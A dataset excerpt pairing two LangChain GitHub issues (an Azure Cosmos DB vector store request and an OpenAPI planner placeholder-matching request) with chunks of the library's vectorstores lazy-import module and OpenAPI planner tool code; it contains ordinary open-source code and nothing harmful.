Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.awadb import AwaDB
return AwaDB
def _import_azuresearch() -> Any:
from langchain.vectorstores.azuresearch import AzureSearch
return AzureSearch
def _import_bageldb() -> Any:
from langchain.vectorstores.bageldb import Bagel
return Bagel
def _import_cassandra() -> Any:
from langchain.vectorstores.cassandra import Cassandra
return Cassandra
def _import_chroma() -> Any:
from langchain.vectorstores.chroma import Chroma
return Chroma
def _import_clarifai() -> Any:
from langchain.vectorstores.clarifai import Clarifai
return Clarifai
def _import_clickhouse() -> Any:
from langchain.vectorstores.clickhouse import Clickhouse
return Clickhouse
def _import_clickhouse_settings() -> Any:
from langchain.vectorstores.clickhouse import ClickhouseSettings
return ClickhouseSettings
def _import_dashvector() -> Any:
from langchain.vectorstores.dashvector import DashVector
return DashVector
def _import_deeplake() -> Any:
from langchain.vectorstores.deeplake import DeepLake
return DeepLake
def _import_dingo() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.dingo import Dingo
return Dingo
def _import_docarray_hnsw() -> Any:
from langchain.vectorstores.docarray import DocArrayHnswSearch
return DocArrayHnswSearch
def _import_docarray_inmemory() -> Any:
from langchain.vectorstores.docarray import DocArrayInMemorySearch
return DocArrayInMemorySearch
def _import_elasticsearch() -> Any:
from langchain.vectorstores.elasticsearch import ElasticsearchStore
return ElasticsearchStore
def _import_epsilla() -> Any:
from langchain.vectorstores.epsilla import Epsilla
return Epsilla
def _import_faiss() -> Any:
from langchain.vectorstores.faiss import FAISS
return FAISS
def _import_hologres() -> Any:
from langchain.vectorstores.hologres import Hologres
return Hologres
def _import_lancedb() -> Any:
from langchain.vectorstores.lancedb import LanceDB
return LanceDB
def _import_llm_rails() -> Any:
from langchain.vectorstores.llm_rails import LLMRails
return LLMRails
def _import_marqo() -> Any:
from langchain.vectorstores.marqo import Marqo
return Marqo
def _import_matching_engine() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.matching_engine import MatchingEngine
return MatchingEngine
def _import_meilisearch() -> Any:
from langchain.vectorstores.meilisearch import Meilisearch
return Meilisearch
def _import_milvus() -> Any:
from langchain.vectorstores.milvus import Milvus
return Milvus
def _import_momento_vector_index() -> Any:
from langchain.vectorstores.momento_vector_index import MomentoVectorIndex
return MomentoVectorIndex
def _import_mongodb_atlas() -> Any:
from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch
return MongoDBAtlasVectorSearch
def _import_myscale() -> Any:
from langchain.vectorstores.myscale import MyScale
return MyScale
def _import_myscale_settings() -> Any:
from langchain.vectorstores.myscale import MyScaleSettings
return MyScaleSettings
def _import_neo4j_vector() -> Any:
from langchain.vectorstores.neo4j_vector import Neo4jVector
return Neo4jVector
def _import_opensearch_vector_search() -> Any:
from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch
return OpenSearchVectorSearch
def _import_pgembedding() -> Any:
from langchain.vectorstores.pgembedding import PGEmbedding
return PGEmbedding
def _import_pgvector() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.pgvector import PGVector
return PGVector
def _import_pinecone() -> Any:
from langchain.vectorstores.pinecone import Pinecone
return Pinecone
def _import_qdrant() -> Any:
from langchain.vectorstores.qdrant import Qdrant
return Qdrant
def _import_redis() -> Any:
from langchain.vectorstores.redis import Redis
return Redis
def _import_rocksetdb() -> Any:
from langchain.vectorstores.rocksetdb import Rockset
return Rockset
def _import_vespa() -> Any:
from langchain.vectorstores.vespa import VespaStore
return VespaStore
def _import_scann() -> Any:
from langchain.vectorstores.scann import ScaNN
return ScaNN
def _import_singlestoredb() -> Any:
from langchain.vectorstores.singlestoredb import SingleStoreDB
return SingleStoreDB
def _import_sklearn() -> Any:
from langchain.vectorstores.sklearn import SKLearnVectorStore
return SKLearnVectorStore
def _import_sqlitevss() -> Any:
from langchain.vectorstores.sqlitevss import SQLiteVSS
return SQLiteVSS
def _import_starrocks() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.starrocks import StarRocks
return StarRocks
def _import_supabase() -> Any:
from langchain.vectorstores.supabase import SupabaseVectorStore
return SupabaseVectorStore
def _import_tair() -> Any:
from langchain.vectorstores.tair import Tair
return Tair
def _import_tencentvectordb() -> Any:
from langchain.vectorstores.tencentvectordb import TencentVectorDB
return TencentVectorDB
def _import_tigris() -> Any:
from langchain.vectorstores.tigris import Tigris
return Tigris
def _import_timescalevector() -> Any:
from langchain.vectorstores.timescalevector import TimescaleVector
return TimescaleVector
def _import_typesense() -> Any:
from langchain.vectorstores.typesense import Typesense
return Typesense
def _import_usearch() -> Any:
from langchain.vectorstores.usearch import USearch
return USearch
def _import_vald() -> Any:
from langchain.vectorstores.vald import Vald
return Vald
def _import_vearch() -> Any:
from langchain.vectorstores.vearch import Vearch
return Vearch
def _import_vectara() -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | from langchain.vectorstores.vectara import Vectara
return Vectara
def _import_weaviate() -> Any:
from langchain.vectorstores.weaviate import Weaviate
return Weaviate
def _import_zep() -> Any:
from langchain.vectorstores.zep import ZepVectorStore
return ZepVectorStore
def _import_zilliz() -> Any:
from langchain.vectorstores.zilliz import Zilliz
return Zilliz
def __getattr__(name: str) -> Any:
if name == "AnalyticDB":
return _import_analyticdb()
elif name == "AlibabaCloudOpenSearch":
return _import_alibaba_cloud_open_search()
elif name == "AlibabaCloudOpenSearchSettings":
return _import_alibaba_cloud_open_search_settings()
elif name == "ElasticKnnSearch":
return _import_elastic_knn_search()
elif name == "ElasticVectorSearch":
return _import_elastic_vector_search()
elif name == "Annoy":
return _import_annoy()
elif name == "AtlasDB":
return _import_atlas()
elif name == "AwaDB":
return _import_awadb() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "AzureSearch":
return _import_azuresearch()
elif name == "Bagel":
return _import_bageldb()
elif name == "Cassandra":
return _import_cassandra()
elif name == "Chroma":
return _import_chroma()
elif name == "Clarifai":
return _import_clarifai()
elif name == "ClickhouseSettings":
return _import_clickhouse_settings()
elif name == "Clickhouse":
return _import_clickhouse()
elif name == "DashVector":
return _import_dashvector()
elif name == "DeepLake":
return _import_deeplake()
elif name == "Dingo":
return _import_dingo()
elif name == "DocArrayInMemorySearch":
return _import_docarray_inmemory()
elif name == "DocArrayHnswSearch":
return _import_docarray_hnsw()
elif name == "ElasticsearchStore":
return _import_elasticsearch()
elif name == "Epsilla":
return _import_epsilla()
elif name == "FAISS":
return _import_faiss() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "Hologres":
return _import_hologres()
elif name == "LanceDB":
return _import_lancedb()
elif name == "LLMRails":
return _import_llm_rails()
elif name == "Marqo":
return _import_marqo()
elif name == "MatchingEngine":
return _import_matching_engine()
elif name == "Meilisearch":
return _import_meilisearch()
elif name == "Milvus":
return _import_milvus()
elif name == "MomentoVectorIndex":
return _import_momento_vector_index()
elif name == "MongoDBAtlasVectorSearch":
return _import_mongodb_atlas()
elif name == "MyScaleSettings":
return _import_myscale_settings()
elif name == "MyScale":
return _import_myscale()
elif name == "Neo4jVector":
return _import_neo4j_vector()
elif name == "OpenSearchVectorSearch":
return _import_opensearch_vector_search()
elif name == "PGEmbedding":
return _import_pgembedding()
elif name == "PGVector":
return _import_pgvector() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "Pinecone":
return _import_pinecone()
elif name == "Qdrant":
return _import_qdrant()
elif name == "Redis":
return _import_redis()
elif name == "Rockset":
return _import_rocksetdb()
elif name == "ScaNN":
return _import_scann()
elif name == "SingleStoreDB":
return _import_singlestoredb()
elif name == "SKLearnVectorStore":
return _import_sklearn()
elif name == "SQLiteVSS":
return _import_sqlitevss()
elif name == "StarRocks":
return _import_starrocks()
elif name == "SupabaseVectorStore":
return _import_supabase()
elif name == "Tair":
return _import_tair()
elif name == "TencentVectorDB":
return _import_tencentvectordb()
elif name == "Tigris":
return _import_tigris()
elif name == "TimescaleVector":
return _import_timescalevector()
elif name == "Typesense":
return _import_typesense() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | elif name == "USearch":
return _import_usearch()
elif name == "Vald":
return _import_vald()
elif name == "Vearch":
return _import_vearch()
elif name == "Vectara":
return _import_vectara()
elif name == "Weaviate":
return _import_weaviate()
elif name == "ZepVectorStore":
return _import_zep()
elif name == "Zilliz":
return _import_zilliz()
elif name == "VespaStore":
return _import_vespa()
else:
raise AttributeError(f"Could not find: {name}")
__all__ = [
"AlibabaCloudOpenSearch",
"AlibabaCloudOpenSearchSettings",
"AnalyticDB",
"Annoy",
"Annoy",
"AtlasDB",
"AtlasDB",
"AwaDB",
"AzureSearch",
"Bagel",
"Cassandra", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | "Chroma",
"Chroma",
"Clarifai",
"Clickhouse",
"ClickhouseSettings",
"DashVector",
"DeepLake",
"DeepLake",
"Dingo",
"DocArrayHnswSearch",
"DocArrayInMemorySearch",
"ElasticKnnSearch",
"ElasticVectorSearch",
"ElasticsearchStore",
"Epsilla",
"FAISS",
"Hologres",
"LanceDB",
"LLMRails",
"Marqo",
"MatchingEngine",
"Meilisearch",
"Milvus",
"MomentoVectorIndex",
"MongoDBAtlasVectorSearch",
"MyScale",
"MyScaleSettings",
"Neo4jVector",
"OpenSearchVectorSearch",
"OpenSearchVectorSearch", |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR would add support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
The capability described in this feature request is currently not available in LangChain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | libs/langchain/langchain/vectorstores/__init__.py | "PGEmbedding",
"PGVector",
"Pinecone",
"Qdrant",
"Redis",
"Rockset",
"SKLearnVectorStore",
"ScaNN",
"SingleStoreDB",
"SingleStoreDB",
"SQLiteVSS",
"StarRocks",
"SupabaseVectorStore",
"Tair",
"Tigris",
"TimescaleVector",
"Typesense",
"USearch",
"Vald",
"Vearch",
"Vectara",
"VectorStore",
"VespaStore",
"Weaviate",
"ZepVectorStore",
"Zilliz",
"Zilliz",
"TencentVectorDB",
] |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
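As a hedged sketch (illustrative only, not necessarily the fix merged in the linked PR), the lookup could treat each `{param}` path segment in the documented route as a wildcard:

```python
def route_matches(documented: str, concrete: str) -> bool:
    """True if a concrete route matches a documented route whose path may
    contain {placeholder} segments (helper name and logic are invented)."""
    doc_parts = documented.split("/")
    con_parts = concrete.split("/")
    if len(doc_parts) != len(con_parts):
        return False
    return all(
        (d.startswith("{") and d.endswith("}")) or d == c
        for d, c in zip(doc_parts, con_parts)
    )

assert route_matches("GET /states/{abbr}", "GET /states/FL")
assert not route_matches("GET /states/{abbr}", "GET /cities/FL")
```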
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Agent that interacts with OpenAPI APIs via a hierarchical planning approach."""
import json
import re
from functools import partial
from typing import Any, Callable, Dict, List, Optional
import yaml
from langchain.agents.agent import AgentExecutor
from langchain.agents.agent_toolkits.openapi.planner_prompt import (
API_CONTROLLER_PROMPT,
API_CONTROLLER_TOOL_DESCRIPTION,
API_CONTROLLER_TOOL_NAME,
API_ORCHESTRATOR_PROMPT,
API_PLANNER_PROMPT,
API_PLANNER_TOOL_DESCRIPTION,
API_PLANNER_TOOL_NAME,
PARSING_DELETE_PROMPT,
PARSING_GET_PROMPT,
PARSING_PATCH_PROMPT,
PARSING_POST_PROMPT,
PARSING_PUT_PROMPT,
REQUESTS_DELETE_TOOL_DESCRIPTION,
REQUESTS_GET_TOOL_DESCRIPTION,
REQUESTS_PATCH_TOOL_DESCRIPTION,
REQUESTS_POST_TOOL_DESCRIPTION,
REQUESTS_PUT_TOOL_DESCRIPTION, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | )
from langchain.agents.agent_toolkits.openapi.spec import ReducedOpenAPISpec
from langchain.agents.mrkl.base import ZeroShotAgent
from langchain.agents.tools import Tool
from langchain.callbacks.base import BaseCallbackManager
from langchain.chains.llm import LLMChain
from langchain.llms.openai import OpenAI
from langchain.memory import ReadOnlySharedMemory
from langchain.prompts import PromptTemplate
from langchain.pydantic_v1 import Field
from langchain.schema import BasePromptTemplate
from langchain.schema.language_model import BaseLanguageModel
from langchain.tools.base import BaseTool
from langchain.tools.requests.tool import BaseRequestsTool
from langchain.utilities.requests import RequestsWrapper
#
#
MAX_RESPONSE_LENGTH = 5000
"""Maximum length of the response to be returned."""
def _get_default_llm_chain(prompt: BasePromptTemplate) -> LLMChain:
return LLMChain(
llm=OpenAI(),
prompt=prompt,
)
def _get_default_llm_chain_factory(
prompt: BasePromptTemplate,
) -> Callable[[], LLMChain]:
"""Returns a default LLMChain factory."""
return partial(_get_default_llm_chain, prompt)
class RequestsGetToolWithParsing(BaseRequestsTool, BaseTool): |
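The `partial` trick above exists because pydantic's `Field(default_factory=...)` expects a zero-argument callable; a minimal standalone sketch of the same idea:

```python
from functools import partial

def build_greeting(name: str) -> str:
    return f"hello, {name}"

# partial pins the argument now but defers the call, yielding the
# zero-argument factory shape that Field(default_factory=...) needs.
factory = partial(build_greeting, "world")
assert factory() == "hello, world"
```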
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests GET tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_get"
"""Tool name."""
description = REQUESTS_GET_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_GET_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
data_params = data.get("params")
response = self.requests_wrapper.get(data["url"], params=data_params)
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPostToolWithParsing(BaseRequestsTool, BaseTool): |
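A hedged sketch of the input string `RequestsGetToolWithParsing._run` expects: a JSON object carrying the request details plus extraction instructions. The URL and values below are invented examples.

```python
import json

tool_input = json.dumps(
    {
        "url": "https://api.example.com/states",  # invented endpoint
        "params": {"abbr": "FL"},                 # optional query params
        "output_instructions": "Return only the state's full name.",
    }
)
# tool._run(tool_input) issues the GET, truncates the body to
# response_length characters, and runs the LLM chain to extract the answer.
```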
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests POST tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_post"
"""Tool name."""
description = REQUESTS_POST_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_POST_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
